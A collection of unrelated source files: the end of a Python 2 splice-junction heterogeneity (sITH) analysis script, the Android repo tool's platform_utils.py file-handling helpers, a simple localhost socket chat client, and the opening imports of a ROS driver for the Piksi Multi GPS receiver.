self.Parser_obj.add_argument('-slb', '--Stranded_Library_bool', dest="Stranded_Library_bool",help = "", default="False")
##End BuildParser_method
##End GenArgumentParser
class GenInputHandler(object):
def __init__(self, ArgumentParser):
#[1]
self.Handler_obj = ArgumentParser.Handler_obj
#[2]
self.SampleRegister_method()
##End init
def SampleRegister_method(self):
#[1]
self.Case_list = []; self.Case_idx = 0
self.Case_path = self.Handler_obj.case_sample_path
for case_line in open(self.Case_path):
if case_line.strip()[0] == "#":
continue
##End if
sample_name, junction_path = case_line.split()[:2]
sampleObj = GenSampleObject()
sampleObj.Name_str = sample_name
sampleObj.Junction_path = junction_path
self.Case_list.append(sampleObj)
##End for
#[2]
self.Ref_list = []; self.Ref_idx = 0
self.Ref_path = self.Handler_obj.reference_sample_path
for ref_line in open(self.Ref_path):
if ref_line.strip()[0] == "#":
continue
##End if
sample_name, junction_path = ref_line.split()[:2]
sampleObj = GenSampleObject()
sampleObj.Name_str = sample_name
sampleObj.Junction_path = junction_path
self.Ref_list.append(sampleObj)
##End for
#[3]
a, b = map(len, [self.Case_list, self.Ref_list])
print " - CASE:%s, REF:%s samples are registered [%s]"%(a, b, GET_TIME())
##End SampleRegister_method
##End GenInputHandler
class GenUnitHandler(object):
def __init__(self, ArgumentParser, InputHandler):
#[1]
self.Handler_obj = ArgumentParser.Handler_obj
self.Ref_list = InputHandler.Ref_list
self.Case_list = InputHandler.Case_list
self.Sample_list = self.Ref_list + self.Case_list
#[2]
self.nProcess_int = int(self.Handler_obj.process_number_int)
self.sLibrary_bool = self.Handler_obj.Stranded_Library_bool.upper() == "TRUE"
self.Out_dir = self.Handler_obj.out_directory_path
self.Unit_dir = self.Out_dir + ss + "tmp"
makePath(self.Out_dir); makePath(self.Unit_dir)
#[3]
self.HashExtract_method()
#[4]
self.UnitGenerate_method()
#[5]
self.UnitExport_method()
#[6]
self.SHD_Export_method()
##End init
def SHD_Export_method(self):
#[1]
self.Normalized_path = self.Out_dir + ss + "sITH_REGIONS.txt"
self.Normalized_file = open(self.Normalized_path, 'r')
self.SampleName_list = self.Normalized_file.readline().split()[4:]
#[2]
self.SHD_dic = {}
for normalized_line in self.Normalized_file:
sample_distance_list = map(float, normalized_line.split()[4:])
for sample_index, sample_distance in zip(range(len(self.SampleName_list)), sample_distance_list):
if sample_index not in self.SHD_dic:
self.SHD_dic[sample_index] = []
##End if
self.SHD_dic[sample_index].append(sample_distance)
##End for
##End for
#[3]
self.SHD_path = self.Out_dir + ss + "sITH.txt"
self.SHD_file = open(self.SHD_path, 'w')
head_line = makeLine(["Sample", "sITH"], tt)
self.SHD_file.write(head_line + nn)
#[4]
for sample_index in sorted(self.SHD_dic):
sample_name = self.SampleName_list[sample_index]
SHD_list = filter(lambda x:not math.isnan(x), self.SHD_dic[sample_index])
if SHD_list:
SHD_AVG = np.mean(SHD_list)
else:
SHD_AVG = float("nan")
##End if-else
SHD_line = makeLine([sample_name, SHD_AVG], tt)
self.SHD_file.write(SHD_line + nn)
##End for
#[5]
self.SHD_file.close()
#[6]
commands.getoutput("rm -r %s"%self.Unit_dir)
##End SHD_Export_method
def UnitExport_method(self):
#[1]
self.Count_path = self.Out_dir + ss + "COUNT.txt"
self.Distance_path = self.Out_dir + ss + "sITH_REGIONS.txt"
#[2]
self.Count_file = open(self.Count_path, 'w')
self.Distance_file = open(self.Distance_path, 'w')
#[3]
self.Hash_list = []; self.Hash_index = 0
self.Hash_path = self.Unit_dir + ss + "HashList.txt"
for hash_line in open(self.Hash_path):
chr_name, hash_size = hash_line.split()
hashObj = GenHashObject(); hashObj.Chr_name = chr_name
hashObj.Job_name = "Hash.%s"%self.Hash_index; self.Hash_index += 1
hashObj.Size_int = int(hash_size)
self.Hash_list.append(hashObj)
##End for
#[4]
self.Hash_index = 0
for jobObj in sorted(self.Hash_list, key=lambda x:x.Size_int, reverse=True):
jobObj.Index_int = self.Hash_index; self.Hash_index += 1
jobObj.Count_path = self.Unit_dir + ss + "%s.COUNT_REGIONS.txt"%jobObj.Job_name
jobObj.Distance_path = self.Unit_dir + ss + "%s.sITH_REGIONS.txt"%jobObj.Job_name
self.JobExport_method(jobObj)
##End for
#[5]
self.Count_file.close()
self.Distance_file.close()
##End UnitExport_method
def JobExport_method(self, jobObj):
#[1]
jobObj.Count_file = open(jobObj.Count_path, 'r')
jobObj.Distance_file = open(jobObj.Distance_path, 'r')
#[2]
if jobObj.Index_int == 0:
self.Count_file.write(jobObj.Count_file.readline())
self.Distance_file.write(jobObj.Distance_file.readline())
head_line = makeLine(["Chromosome", "Shared_site[1-based]", "Fixed_sites[1-based]"], tt)
else:
jobObj.Count_file.readline()
jobObj.Distance_file.readline()
##End if
#[3]
self.Count_file.write(jobObj.Count_file.read())
self.Distance_file.write(jobObj.Distance_file.read())
#[4]
jobObj.Count_file.close()
jobObj.Distance_file.close()
##End JobExport_method
def UnitGenerate_method(self):
#[1]
self.Process_list = []
self.Semaphore_obj = mp.Semaphore(self.nProcess_int)
self.Hash_path = self.Unit_dir + ss + "HashList.txt"
self.Hash_line_list = open(self.Hash_path).readlines()
self.Hash_index_list = range(len(self.Hash_line_list))
self.HASH_flag_list = map(lambda x:int(np.percentile(self.Hash_index_list,x)), range(0,101,10))
#[2]
self.Hash_index = 0
for hash_line in open(self.Hash_path):
chr_name, hash_size = hash_line.split()
jobObj = GenHashObject(); jobObj.Chr_name = chr_name
jobObj.Job_name = "Hash.%s"%self.Hash_index; self.Hash_index += 1
self.Semaphore_obj.acquire(); argVect = tuple([jobObj])
procObj = mp.Process(target=self.JobProcess_method, args=argVect)
procObj.start(); self.Process_list.append(procObj)
if (self.Hash_index-1) in self.HASH_flag_list:
a, b = self.Hash_index, len(self.Hash_line_list)
print " - %s/%s jobs are being processed... [%s]"%(a, b, GET_TIME())
##End if
##End for
#[3]
for procObj in self.Process_list:
procObj.join()
##End for
##End UnitGenerate_method
def JobProcess_method(self, jobObj):
#[1]
self.Chr_name = jobObj.Chr_name
self.Job_name = jobObj.Job_name
#[2]
self.UnitExtract_method()
#[3]
self.CountExtract_method()
#[4]
self.DistanceExtract_method()
#[5]
self.Semaphore_obj.release()
##End JobProcess_method
def DistanceExtract_method(self):
#[1]
self.Count_path = self.Unit_dir + ss + "%s.COUNT_REGIONS.txt"%self.Job_name
self.Count_file = open(self.Count_path, 'r')
self.Count_file.readline()
#[2]
self.Distance_path = self.Unit_dir + ss + "%s.sITH_REGIONS.txt"%self.Job_name
self.Distance_file = open(self.Distance_path, 'w')
self.Name_list = map(lambda x:x.Name_str, self.Case_list)
self.Head_line = makeLine(["Chromosome", "Shared_site[1-based]", "Alternative_sites[1-based]", "Strand"] + self.Name_list, tt)
self.Distance_file.write(self.Head_line + nn)
#[3]
for count_line in self.Count_file:
distance_line = self.Get_DistanceLine_method(count_line)
self.Distance_file.write(distance_line + nn)
##End for
#[4]
self.Distance_file.close()
##End DistanceExtract_method
def Get_DistanceLine_method(self, count_line):
#[1]
chr_name, shared_site, alternative_sites, strand = count_line.split()[:4]
count_line_list = count_line.split()[4:]
count_vector_list = map(lambda x:map(float,x.split(cc)), count_line_list)
#[2]
profile_vector_list = []
for count_vector in count_vector_list:
#[2-1]
count_sum = float(sum(count_vector))
if count_sum == 0:
profile_vector = [float("nan")] * len(count_vector)
else:
profile_vector = self.Get_ProfileVector_method(count_vector)
##End if-else
#[2-2]
profile_vector_list.append(profile_vector)
##End for
#[3]
avg_case_distance_dic = {}
avg_case_distance_list = []
for caseObj in self.Case_list:
#[3-1]
case_idx = caseObj.Index_int
case_profile = profile_vector_list[case_idx]
case_distance_list = []
#[3-2]
case_profile_key = tuple(case_profile)
if case_profile_key in avg_case_distance_dic:
avg_case_distance = avg_case_distance_dic[case_profile_key]
avg_case_distance_list.append(avg_case_distance); continue
##End if
#[3-3]
case_ref_distance_dic = {}
for refObj in self.Ref_list:
#[3-3-1]
ref_idx = refObj.Index_int
ref_profile = profile_vector_list[ref_idx]
#[3-3-2]
ref_profile_key = tuple(ref_profile)
if ref_profile_key in case_ref_distance_dic:
case_distance = case_ref_distance_dic[ref_profile_key]
case_distance_list.append(case_distance); continue
##End if
#[3-3-3]
case_distance = self.GetDistance_method(ref_profile, case_profile)
case_distance_list.append(case_distance)
case_ref_distance_dic[ref_profile_key] = case_distance
##End for
#[3-4]
case_distance_list = filter(lambda x:not math.isnan(x), case_distance_list)
if case_distance_list:
avg_case_distance = np.mean(case_distance_list)
else:
avg_case_distance = float("nan")
##End if-else
#[3-5]
avg_case_distance_list.append(avg_case_distance)
avg_case_distance_dic[case_profile_key] = avg_case_distance
##End for
#[4]
distance_line = makeLine([chr_name, shared_site, alternative_sites, strand] + avg_case_distance_list, tt)
return distance_line
##End Get_DistanceLine_method
def Get_ProfileVector_method(self, count_vector):
#[1]
count_sum = sum(count_vector); pseudo_count = count_sum/100.
adjusted_count_vector = map(lambda x:x+pseudo_count, count_vector)
adjusted_count_sum = sum(adjusted_count_vector)
#[2]
adjusted_profile_vector = map(lambda x:x/adjusted_count_sum, adjusted_count_vector)
return adjusted_profile_vector
##End Get_ProfileVector_method
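# Worked example (illustrative, not in the original script): counts [8, 2, 0]
# give count_sum = 10 and pseudo_count = 0.1, so the adjusted counts are
# [8.1, 2.1, 0.1] with sum 10.3 and the returned profile is roughly
# [0.786, 0.204, 0.010]. The pseudo-count keeps zero-count sites representable
# so the distance computed below stays finite.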
def GetDistance_method(self, profile_A, profile_B):
#[1]
if profile_A == profile_B:
return 0.
##End if
#[2]
profile_M = map(lambda x:(x[0]+x[1])/2, zip(profile_A, profile_B))
#[3]
profile_M_sum = sum(profile_M)
if math.isnan(profile_M_sum):
return float("nan")
##End if
#[4]
distance_A = entropy(profile_A, profile_M, base=2)
distance_B = entropy(profile_B, profile_M, base=2)
#[5]
return (distance_A + distance_B)/2
##End GetDistance_method
def CountExtract_method(self):
#[1]
self.CountRegister_method()
#[2]
self.CountExport_method()
##End CountExtract_method
def CountExport_method(self):
#[1]
self.Count_path = self.Unit_dir + ss + "%s.COUNT_REGIONS.txt"%self.Job_name
self.Count_file = open(self.Count_path, 'w')
self.Name_list = map(lambda x:x.Name_str, self.Sample_list)
self.Head_line = makeLine(["Chromosome", "Shared_site[1-based]", "Alternative_sites[1-based]", "Strand"] + self.Name_list, tt)
self.Count_file.write(self.Head_line + nn)
#[2]
case_name_set = set(map(lambda x:x.Name_str, self.Case_list))
ref_name_set = set(map(lambda x:x.Name_str, self.Ref_list))
for unitObj in sorted(self.Unit_list, key=lambda x:x.Fixed_site):
#[2-1]
sample_index_list = sorted(unitObj.Count_dic.keys())
sample_name_set = set(map(lambda x:self.Sample_list[x].Name_str, sample_index_list))
#[2-2]
if not (sample_name_set & case_name_set):
continue
##End if
if not (sample_name_set & ref_name_set):
continue
##End if
#[2-3]
unitObj.Var_sites = sorted(unitObj.Var_sites)
count_line_list = []
for sampleObj in self.Sample_list:
var_count_list = []
for var_site in unitObj.Var_sites:
try: var_count = unitObj.Count_dic[sampleObj.Index_int][var_site]
except KeyError: var_count = 0
var_count_list.append(var_count)
##End for
var_count_line = makeLine(var_count_list, cc)
count_line_list.append(var_count_line)
##End for
#[2-4]
var_sites_line = makeLine(map(lambda x:x[0], unitObj.Var_sites), cc)
unit_count_line = makeLine([unitObj.Chr_name, unitObj.Fixed_site[0], var_sites_line, unitObj.Strand_str] + count_line_list, tt)
self.Count_file.write(unit_count_line + nn)
##End for
#[3]
self.Count_file.close()
##End CountExport_method
def CountRegister_method(self):
for raw_line in open(self.Raw_path):
#[1]
chr_name, junc_st, junc_ed, junc_str, sample_idx, junc_cnt = raw_line.split()
junc_st, junc_ed, sample_idx = map(int, [junc_st, junc_ed, sample_idx])
junc_cnt = float(junc_cnt)
#[2]
junc_st_key = int(junc_st), junc_str; junc_ed_key = int(junc_ed), junc_str
#[3]
if junc_st_key in self.Unit_dic:
unitObj = self.Unit_dic[junc_st_key]
if sample_idx not in unitObj.Count_dic:
unitObj.Count_dic[sample_idx] = {}
##End if
unitObj.Count_dic[sample_idx][junc_ed_key] = junc_cnt
##End if
#[4]
if junc_ed_key in self.Unit_dic:
unitObj = self.Unit_dic[junc_ed_key]
if sample_idx not in unitObj.Count_dic:
unitObj.Count_dic[sample_idx] = {}
##End if
unitObj.Count_dic[sample_idx][junc_st_key] = junc_cnt
##End if
##End for
##End CountRegister_method
def UnitExtract_method(self):
#[1]
self.Left_dic = {}; self.Right_dic = {}
#[2]
self.Raw_path = self.Unit_dir + ss + "%s.RAW.txt"%self.Job_name
self.Raw_file = open(self.Raw_path,'w'); self.Sample_idx = 0
for sampleObj in self.Sample_list:
sampleObj.Index_int = self.Sample_idx; self.Sample_idx += 1
self.SampleProcess_method(sampleObj)
##End for
#[3]
self.Raw_file.close()
self.Left_list = filter(lambda x:len(x.Var_sites)>=2, self.Left_dic.values())
self.Right_list = filter(lambda x:len(x.Var_sites)>=2, self.Right_dic.values())
self.Unit_list = self.Left_list + self.Right_list
#[4]
self.Unit_dic = {}
for unitObj in self.Unit_list:
self.Unit_dic[unitObj.Fixed_site] = unitObj
##End for
##End UnitExtract_method
def SampleProcess_method(self, sampleObj):
for bed_line in open(sampleObj.Junction_path):
#[1]
chr_name, bed_st, bed_ed, x, junc_cnt, junc_str = bed_line.split()
junc_st = int(bed_st)+1; junc_ed = int(bed_ed); junc_cnt = float(junc_cnt)
if not self.sLibrary_bool:
junc_str = "_"
##End if
if chr_name != self.Chr_name:
continue
##End if
if junc_cnt == 0:
continue
##End if
#[2]
junc_st_key = junc_st, junc_str
junc_ed_key = junc_ed, junc_str
#[3]
if junc_st_key not in self.Left_dic:
unitObj = GenUnitObject()
unitObj.Chr_name = chr_name
unitObj.Fixed_site = junc_st_key
unitObj.Var_sites = set([])
unitObj.Strand_str = junc_str
unitObj.Count_dic = {}
self.Left_dic[junc_st_key] = unitObj
##End if
unitObj = self.Left_dic[junc_st_key]
unitObj.Var_sites.add(junc_ed_key)
#[4]
if junc_ed_key not in self.Right_dic:
unitObj = GenUnitObject()
unitObj.Chr_name = chr_name
unitObj.Fixed_site = junc_ed_key
unitObj.Var_sites = set([])
unitObj.Strand_str = junc_str
unitObj.Count_dic = {}
self.Right_dic[junc_ed_key] = unitObj
##End if
unitObj = self.Right_dic[junc_ed_key]
unitObj.Var_sites.add(junc_st_key)  # a fixed junction end collects its variable start sites (mirrors block [3])
#[5]
raw_line = makeLine([chr_name, junc_st, junc_ed, junc_str, sampleObj.Index_int, junc_cnt], tt)
self.Raw_file.write(raw_line + nn)
##End for
##End SampleProcess_method
def HashExtract_method(self):
#[1]
self.Sample_list = self.Case_list + self.Ref_list
#[2]
random.seed(0)
self.Random_cases = random.sample(self.Case_list, min(len(self.Case_list), 3))
self.Random_refs = random.sample(self.Ref_list, min(len(self.Ref_list), 3))
self.Random_list = self.Random_cases + self.Random_refs
#[3]
self.Hash_dic = {}
for sampleObj in self.Random_list:
self.Get_SampleHash_method(sampleObj)
##End for
#[4]
for hashObj in self.Hash_dic.values():
hashObj.Size_int = hashObj.Range_list[1]-hashObj.Range_list[0]
##End for
#[5]
self.Hash_path = self.Unit_dir + ss + "HashList.txt"
self.Hash_file = open(self.Hash_path, 'w')
for hashObj in sorted(self.Hash_dic.values(), key=lambda x:x.Size_int):
hash_line = makeLine([hashObj.Chr_name, hashObj.Size_int], tt)
self.Hash_file.write(hash_line + nn)
##End for
#[6]
self.Hash_file.close()
##End HashExtract_method
def Get_SampleHash_method(self, sampleObj):
for bed_line in open(sampleObj.Junction_path):
chr_name, bed_st, bed_ed, x, x, junc_str = bed_line.split()[:6]
if chr_name not in self.Hash_dic:
hashObj = GenHashObject(); hashObj.Chr_name = chr_name
hashObj.Reference_bit = False
hashObj.Range_list = [float("inf"), -float("inf")]
self.Hash_dic[chr_name] = hashObj
##End if
hashObj = self.Hash_dic[chr_name]
if sampleObj in self.Ref_list:
hashObj.Reference_bit = True
##End if
hashObj.Range_list[0] = min(hashObj.Range_list[0], int(bed_st))
hashObj.Range_list[1] = max(hashObj.Range_list[1], int(bed_ed))
##End for
##End Get_SampleHash_method
##End GenUnitHandler
class GenSampleObject(object):
def __init__(self):
pass
##End init
##End GenSampleObject
class GenCommObject(object):
def __init__(self):
pass
##End init
##End GenCommObject
class GenHashObject(object):
def __init__(self):
pass
##End init
##End GenHashObject
class GenUnitObject(object):
def __init__(self):
pass
##End init
##End GenUnitObject
def makePath(dirPath):
return commands.getoutput("mkdir %s"%dirPath)
##End makePath
def makeLine(tokenList, sepToken):
return sepToken.join(map(str, tokenList))
##End makeLine
if __name__ == "__main__" :
main()
sys.exit()
##End if
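# --- Illustrative sketch (not part of the original script) ---
# GetDistance_method above averages the relative entropy of each profile
# against their midpoint, i.e. it computes the Jensen-Shannon divergence in
# bits. The helper below restates that computation with only the standard
# library so it can be sanity-checked outside the pipeline; the function and
# variable names are illustrative and do not exist in the original code.
import math
def jensen_shannon_divergence_sketch(profile_a, profile_b):
    """Return the base-2 Jensen-Shannon divergence of two discrete distributions."""
    midpoint = [(a + b) / 2.0 for a, b in zip(profile_a, profile_b)]
    def kl_bits(p, q):
        # Kullback-Leibler divergence in bits; terms with p_i == 0 contribute 0.
        return sum(p_i * math.log(p_i / q_i, 2) for p_i, q_i in zip(p, q) if p_i > 0)
    return (kl_bits(profile_a, midpoint) + kl_bits(profile_b, midpoint)) / 2.0
# Example: identical profiles give 0.0; fully disjoint profiles give 1.0 bit.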
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(self, fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
def __init__(self):
super(_FileDescriptorStreamsNonBlocking, self).__init__()
self._poll = select.poll()
self._fd_to_stream = {}
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
stream = self.Stream(fd, dest, std_name)
self._fd_to_stream[stream.fileno()] = stream
self._poll.register(stream, select.POLLIN)
return stream
def remove(self, stream):
self._poll.unregister(stream)
del self._fd_to_stream[stream.fileno()]
super(_FileDescriptorStreamsNonBlocking, self).remove(stream)
def select(self):
return [self._fd_to_stream[fd] for fd, _ in self._poll.poll()]
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared across all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straightforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
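# --- Illustrative usage sketch (not part of the original module) ---
# The FileDescriptorStreams docstrings above describe the intended calling
# pattern: wrap each pipe with add(), poll with select(), and call remove()
# once a stream reports EOF. The helper below is a minimal sketch of that loop
# for a hypothetical subprocess.Popen object; the 'proc' argument and the
# destination lists are assumptions made for illustration only.
def _demo_drain_process_output(proc):
    """Drain stdout/stderr of a subprocess using FileDescriptorStreams."""
    streams = FileDescriptorStreams.create()
    stdout_lines, stderr_lines = [], []
    streams.add(proc.stdout, dest=stdout_lines, std_name='stdout')
    streams.add(proc.stderr, dest=stderr_lines, std_name='stderr')
    while not streams.is_done:
        for stream in streams.select():
            data = stream.read()
            if not data:
                # EOF on this stream: close it and stop watching it.
                stream.close()
                streams.remove(stream)
            else:
                stream.dest.append(data)
    return stdout_lines, stderr_lines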
|
client_code.py
|
import socket
import random
from threading import Thread
from datetime import datetime
from colorama import Fore, init, Back
init()
colors = [Fore.BLUE, Fore.CYAN, Fore.GREEN, Fore.LIGHTBLACK_EX,
Fore.LIGHTBLUE_EX]
client_color = random.choice(colors)
SERVER_HOST = "127.0.0.1"
SERVER_PORT = 5002
separator_token = "<SEP>"
s = socket.socket()
print(f"[*] connecting to {SERVER_HOST}:{SERVER_PORT}...")
s.connect((SERVER_HOST, SERVER_PORT))
print("[+] connected")
name = input("Enter your name:")
def listen_for_messages():
while True:
message = s.recv(1024).decode()
print("\n" + message)
t = Thread(target=listen_for_messages)
t.daemon = True
t.start()
while True:
to_send = input()
if to_send.lower() == "q":
break
date_now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
to_send = f"{client_color}[{date_now}]{name}{separator_token}{to_send}{Fore.RESET}"
s.send(to_send.encode())
s.close()
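# --- Illustrative sketch (not part of the original client) ---
# Each outgoing message is framed as "<color>[timestamp]name<SEP>text<reset>",
# with separator_token marking the boundary between sender prefix and text.
# A receiving peer could split that frame as sketched below; the function name
# and the fallback behaviour are assumptions for illustration only.
def split_chat_message(raw_message, sep=separator_token):
    """Return (prefix, text) if the separator is present, else (None, raw_message)."""
    if sep in raw_message:
        prefix, text = raw_message.split(sep, 1)
        return prefix, text
    return None, raw_message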
|
piksi_multi.py
|
#!/usr/bin/env python
#
# Title: piksi_multi.py
# Description: ROS Driver for Piksi Multi RTK GPS module
# Dependencies: libsbp (https://github.com/swift-nav/libsbp), tested with version = see LIB_SBP_VERSION_MULTI
# Based on original work of https://bitbucket.org/Daniel-Eckert/piksi_node
#
import rospy
import math
import numpy as np
import std_srvs.srv
# Import message types
from sensor_msgs.msg import NavSatFix, NavSatStatus
import piksi_rtk_msgs # TODO(rikba): If we don't have this I get NameError: global name 'piksi_rtk_msgs' is not defined.
from piksi_rtk_msgs.msg import (AgeOfCorrections, BaselineEcef, BaselineHeading, BaselineNed, BasePosEcef, BasePosLlh,
DeviceMonitor_V2_3_15, DopsMulti, GpsTimeMulti, Heartbeat, ImuRawMulti,
InfoWifiCorrections, Log, MagRaw, MeasurementState_V2_4_1, Observation, PosEcef, PosLlhMulti,
ReceiverState_V2_4_1, UartState_V2_3_15, UtcTimeMulti, VelEcef, VelNed)
